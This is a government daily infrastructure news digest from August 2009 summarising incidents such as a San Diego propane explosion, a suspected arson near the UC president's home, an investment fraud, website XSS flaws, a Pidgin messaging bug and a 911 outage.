Department of Homeland Security Daily Open Source Infrastructure Report

Monday, August 24, 2009

Complete DHS Daily Report for August 24, 2009

Daily Report

Top Stories

 XETV 6 San Diego reports that a 300-gallon propane tank exploded on August 20 at John Lenore Company, a beverage distributing company, in San Diego, California. The explosion caused a fire which forced 50 people living in a one-mile radius to evacuate their homes. (See item 18)


18. August 21, XETV 6 San Diego – (California) 300-pound propane tank explodes at soda distributor. A 300-gallon propane tank exploded at a beverage distributing company Thursday afternoon in San Diego. It happened near the I-15 during rush hour traffic in Golden Hill and shut down part of the freeway for about an hour. The explosion caused a fire which forced several people living nearby to evacuate. Helicopters and fire trucks raced to the canyon setting of the John Lenore Company. At least 50 people living in a one-mile radius had to leave their homes. Firefighters say the tank explosion started parts of the building and the surrounding grass on fire. “When you have a propane tank burning, it’s going to be hot for a long time,” said the battalion chief with San Diego Fire. “It takes a long time to burn 300 pounds of propane.” Fire investigators are not sure why the tank exploded, but no one was injured. It is also unknown what type of health hazard the black smoke was to the area. Source: http://www.sandiego6.com/news/local/story/300-Pound-Propane-Tank-Explodes-at-Soda/nS1OsWkMZkC5KczAWiD8fA.cspx


 According to NBC Bay Area, arson investigators are investigating a car fire on August 20 near the Oakland, California home of the president of the entire University of California system, who has been the target of recent protests related to tuition hikes and employee furloughs approved to offset UC’s budget deficit. (See item 31)


31. August 20, NBC Bay Area – (California) Car torched outside UC president’s home. Arson investigators are investigating a car fire in Oakland. The suspected arson is getting extra attention because it happened near the home of the president of the entire University of California system. The FBI and ATF were called to help in the investigation. The Alameda County sheriff said it appears some sort of accelerant was used in the fire. The car was parked across the street from where the president lives. Authorities are not saying who owns the vehicle, other than it is not the president, who was taken by car out of the area just before 9 a.m. Thursday, but did not talk to reporters. Nobody was hurt in the fire. An Oakland police spokesman said investigators are not yet calling the fire arson because they have not ruled out the possibility that an electrical problem caused the fire. The university president has been the target of recent protests related to tuition hikes and employee furloughs approved to offset UC’s budget deficit. Source: http://www.nbcbayarea.com/news/local-beat/Car-Torched-Outside-UC-Presidents-Home-53805927.html


Details

Banking and Finance Sector

13. August 21, HedgeCo.net – (National) SEC halts phony investment fund by San Diego fraudster. The Securities and Exchange Commission on August 20 received permission to freeze the assets of a fraudster who allegedly raised as much as $70 million from 300 investors though his fund, MAK 1 Enterprises Group, LLC. The SEC says he solicited investors in Southern California and several other states, as well as a charitable foundation, through word-of-mouth referrals and a website. The defendant claimed to pool investor funds to invest in commercial paper, foreign currency trading products, and other investments, which the SEC believes to be non-existent. Instead, he misused investor funds to pay for several luxury cars and residential properties, including those now owned by his wife, who was also named as a relief defendant. The complaint alleges the fraudster fabricated and gave to an accountant a “screen shot” of MAK 1’s online banking activity purporting to show a balance of over $50 million in its bank account, in reality, the average daily balance in that account never exceeded $197,000. Source: http://www.hedgeco.net/news/08/2009/sec-halts-phony-investment-fund-by-san-diego-fraudster.html


14. August 20, The Register – (International) Security bugs crawl all over financial giant’s website. For the past five months, a website for investment services giant Ameriprise Financial contained bugs that allowed even low-level criminals to inject malicious content into official company webpages and steal user’s cookies, according to a web security expert. The XSS, or cross-site scripting, flaws made it possible for phishers to send Ameriprise customers bona fide links to the Ameriprise website that opened pages that intermingled counterfeit content with legitimate text and graphics. The holes could also allow criminals to steal browser cookies used to authenticate online accounts. In the five months since a researcher of HolisticInfoSec.org first identified the bugs, Ameriprise offered customers statements like this one, which assures visitors that “no one without the proper web browser configuration can view or modify information contained on our systems.” And yet, not one of the half-dozen warnings the researcher sent were answered. “The reality is that not enough of these companies at that level, particularly in the financial sector, properly do intake for vulnerabilities,” said the researcher. “There should be something on their site that says ‘If you see a security issue on our site, please report it.’” Source: http://www.theregister.co.uk/2009/08/20/ameriprise_website_vulnerabilities/


Information Technology


35. August 21, The Register – (International) IM client library bug plagues Pidgin. Users of Pidgin and other alternative IM clients need to update their software following the discovery of potentially serious security flaws. Pidgin, Finch, Adium, Meebo, and Gaim are all vulnerable to a flaw that stems from a bug in Libpurple, library software for multi-protocol support that is used by many IM clients. The vulnerability stems from bugs in the software function that handles instant messages from the MSN network. The flaw was discovered by CORE Security. The flaw is particularly serious because all it takes to take advantage of the vulnerability is a message from a regular MSN user, not necessarily on a targeted user’s buddy list, the SANS Institute Internet Storm Centre warns. Users are advised to update to an IM client that uses non-vulnerable versions of Libpurple (version 2.5.9 or above). For Pidgin, the most common of the alternative IM packages affected, that means updating to version 2.5.9. The issue provides further evidence that users of alternative client software may remove themselves from the main line of attacks but not from the need to patch their systems. Source: http://www.theregister.co.uk/2009/08/21/im_client_security_update/

36. August 19, DarkReading – (International) Rare malware a hint of threats to come. While pervasive, widespread malware attacks like Conficker get all the attention, there is another generation of obscure and dangerous malware that so far is too rare to be considered a threat — but could provide a hint of things to come. Security researchers are seeing some intriguing malware in small pockets. One piece of malware found on a desktop machine during a forensics investigation was actually pre-coded to steal specific information from the victim’s organization, says the CEO and founder of HBGary, whose company sees about 5,000 new pieces of malware a day. “It knew what it was looking for,” he says. And the malware was disposable so that it could disappear without a trace after doing its dirty work. A common thread among most of these unusual or odd malware samples that typically fly under the radar is that they are all about going after specific information or data, rather than more general attacks that cast a wide net and make the headlines. And the writers of these lesser-known and uncommon malware packages are using new methods to keep the attacks alive longer — even if it means brazenly attacking researchers who try to study them. Even so, most attacks over the next five years will still come from the morphing malware variants that are common today, but in higher and higher volumes, experts say. “We’re going to have to deal with more volume and attacks. And at the same time, there will be instances of really high quality attacks, where the attackers have thought things through — and not for a quick buck, but for something sustainable,” says the chief security advisor for F-Secure. “We’ll see more malware families that are technically advanced and stay around for longer periods of time,” he says. “Instead of recompiling variants of existing [malware], they will be refined slowly but surely, in a controlled manner” with new features, as Conficker and Torpig were, he says. Source: http://www.darkreading.com/security/client/showArticle.jhtml?articleID=219400756

Communications Sector

37. August 21, TelecomTiger – (International) Tata Comm to offer built-in DDoS as part of Internet Access services in North America. Tata Communications announced that it will offer built-in Distributed Denial of Service (DDoS) detection and mitigation services as part of its Dedicated Internet Access offering in North America. Enterprises in the region will now be able to fend off DDoS attacks by the Managed Security Service of Tata Comm which will offer the services as part of its Internet Clean Pipe services. The Internet Clean Pipe service absorbs attacks the moment the attack traffic is detected on Tata Communications’ global IP backbone. Tata Comm is leveraging its partnership with Arbor Networks for this service. The chief security officer of Arbor Networks said: “Recent incidents such as those involving social networking, government, and commercial targets over the past month should serve as a stark reminder to any Internet-connected organization that DDoS remains a very real threat, and if unprepared, may result in considerable business impact. With the scale and sophistication of attacks today, enterprises must cooperate with their network services provider to obtain adequate protection in the event of such attacks.” Source: http://www.telecomtiger.com/fullstory.aspx?passfrom=enterprisestory&storyid=6945


38. August 21, Albany Times-Union – (New York) Verizon criticized after outage at 911 center. Rensselaer County, New York, officials blame Verizon for the five-hour shutdown of the county’s Emergency 911 Dispatch Center on the night August 19. This was the third time since December that the county lost its emergency dispatch center, which handles most fire, police and ambulance calls in the county, due to a power failure in South Troy. Officials said Thursday Verizon knew its equipment serving the dispatch center was operating on a battery backup because of a power outage but never took steps to bring in a generator or alert the county of the situation. The battery failed after its four hours of capacity were used up, and emergency calls in the county were routed to the State Police and the East Greenbush Police Department, which are the backups when the county system fails. Source: http://www.timesunion.com/AspStories/story.asp?storyID=833545&category=REGION


39. August 20, AngryCountry.com – (Tennessee) Nashville’s 98 WSIX studios severely damaged by large lightning strike. Clear Channel/Nashville, which includes WSIX, was rocked by a lightning bolt that struck the cluster’s ST/L on August 20. The bolt knocked out power for a short time and fried equipment throughout the building. “Two studios toast, one on life support; computers, sound cards, phone system and more up in smoke,” the WSIX programming director posted on his Facebook page. “Our engineering team is great. All five stations are on the air and nobody got hurt.” WSIX was off-air for nearly an hour, however. Source: http://magazine.angrycountry.com/article.php?story=20090820191800665